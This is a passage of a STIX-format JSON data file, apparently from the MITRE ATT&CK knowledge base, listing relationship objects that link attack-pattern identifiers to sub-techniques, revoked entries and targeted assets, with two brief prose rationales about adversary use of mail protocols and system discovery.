"x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--adfeb8d8-1ce1-4abe-9861-21e2b26e8caa", "created": "2020-02-04T12:58:40.996Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ae4e86c6-4bbb-4aba-80fc-c20a8f3d63dc", "created": "2023-09-28T19:50:14.201Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:50:14.201Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ae8d9f3e-9243-4702-a305-e4b53cd32351", "created": "2019-12-03T14:15:27.693Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-08-14T13:10:28.809Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3", "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aee0e283-5bbd-4332-af46-f477d3ce38d6", "created": "2020-02-04T12:59:37.774Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--2edd9d6a-5674-4326-a600-ba56de467286", "target_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--af25cacc-6b1a-47d2-8e13-cb2a7e92b379", "created": "2023-09-28T21:17:32.313Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:17:32.313Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--af802091-fee7-4d15-a845-fb4ee3c26d6d", "created": "2023-09-29T16:44:42.393Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:44:42.393Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--afaa6cd5-ff04-479a-a3e6-c25a4154be4b", "created": "2020-03-02T19:21:35.323Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--20138b9d-1aac-4a26-8654-a36b6bbf2bba", "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--afb0685e-2c5c-4eec-9205-b1afdab4eda5", "created": "2020-01-24T16:48:51.340Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--dce31a00-1e90-4655-b0f9-e2e71a748a87", "target_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--afcc8362-e43f-4be9-8fe4-c6c2ce4590b1", "created": "2020-01-24T14:22:27.738Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--04ef4356-8926-45e2-9441-634b6f3dcecb", "target_ref": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--afe18ec4-b5b8-43f7-b9e9-64a579b4b4e1", "created": "2023-09-29T17:37:41.336Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:37:41.336Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aff2fb40-9ef5-42c9-bc7a-4939b509fbf1", "created": "2023-09-29T16:40:30.440Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:40:30.440Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b001d78a-afd6-47bb-bdb5-73e967e35a13", "created": "2022-09-29T18:30:12.366Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-09-29T18:30:12.366Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b05016f4-950a-40f4-9fe2-e924d7455c28", "created": "2019-12-19T20:21:21.900Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b0945f9b-5608-472e-ad70-7b42c3e062a1", "created": "2023-09-28T21:21:18.081Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:21:18.081Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b0f5d834-3e35-4e09-8bc0-1487027b74f9", "created": "2020-02-03T16:49:58.300Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "target_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b12d78d7-5b93-4905-9310-95ad67abaff9", "created": "2020-01-13T17:12:35.481Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b1921480-8499-46a9-8396-2a2d747c5861", "created": "2023-09-28T19:58:00.892Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:58:00.892Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b1ad2de8-905c-4dc4-b6f4-fed72bdfe4fe", "created": "2024-05-23T04:03:56.660Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:03:44.921Z", "description": "Asset Mapping Rationale: Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.", "relationship_type": "targets", "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b21e0340-976d-44b2-94ae-f777199993c6", "created": "2023-09-28T19:39:00.326Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:39:00.326Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b289c971-3fb7-4c3c-b3d6-cf2702b9384a", "created": "2023-09-28T21:10:50.480Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:10:50.480Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b2d97276-503d-4fd0-9517-92e05a774de0", "created": "2020-03-11T14:49:37.076Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b2e8914a-91bc-42df-8b64-22e5365ede6f", "created": "2023-09-29T17:42:11.005Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:42:11.005Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b316741b-8bd3-4af6-9d5c-76afca7b9012", "created": "2020-10-01T01:42:25.082Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b33f2abc-a218-425b-9a90-b75445b7e142", "created": "2023-09-29T18:05:51.795Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:05:51.795Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b352884f-2a60-41c6-b348-0bbb5859802a", "created": "2023-09-28T20:01:52.459Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:01:52.459Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b37844c1-0338-44f6-9116-48fa0f079913", "created": "2023-09-29T17:41:11.611Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:41:11.611Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b37b128a-aefc-4b40-9d2a-c213d7b29b43", "created": "2020-02-14T13:35:33.221Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b3aab26c-09c6-4264-af2a-5df260d3d8e2", "created": "2023-09-28T19:48:58.160Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:48:58.160Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b411f748-a1e9-40c6-8eb3-72f2de4dab08", "created": "2023-09-28T20:02:20.170Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:02:20.170Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b4b4c873-3a4a-4bd1-adc2-631c02ddd91c", "created": "2020-01-14T01:33:19.154Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b4bb8bd7-8984-45de-888f-45c51ab157fa", "created": "2023-09-29T17:45:55.581Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:45:55.581Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b4bff800-f33a-472c-9000-23fa217aac69", "created": "2020-03-30T03:09:45.501Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b54dd734-7d12-4f69-89f7-d89e9090777a", "created": "2020-10-01T02:11:47.282Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b5963cc5-0488-46a8-b47a-b781ac724590", "created": "2019-12-13T16:46:19.048Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b59a96e4-bd70-4459-9609-66563bccd9c3", "created": "2023-09-29T16:38:21.688Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:38:21.688Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b62e3314-b9f8-4d87-b24a-2fe50bc62e3f", "created": "2024-05-22T17:26:18.098Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:05:13.313Z", "description": "Asset Mapping Rationale: An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may also leverage a Network Device CLI on network devices to gather detailed system information.", "relationship_type": "targets", "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6309476-8268-4c47-920b-8a556cd8ae4c", "created": "2023-09-29T18:47:07.359Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:47:07.359Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6765164-14b8-4804-aa68-0d88d48c1582", "created": "2024-03-28T03:29:36.246Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-28T03:29:36.246Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--149b477f-f364-4824-b1b5-aa1d56115869", "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, 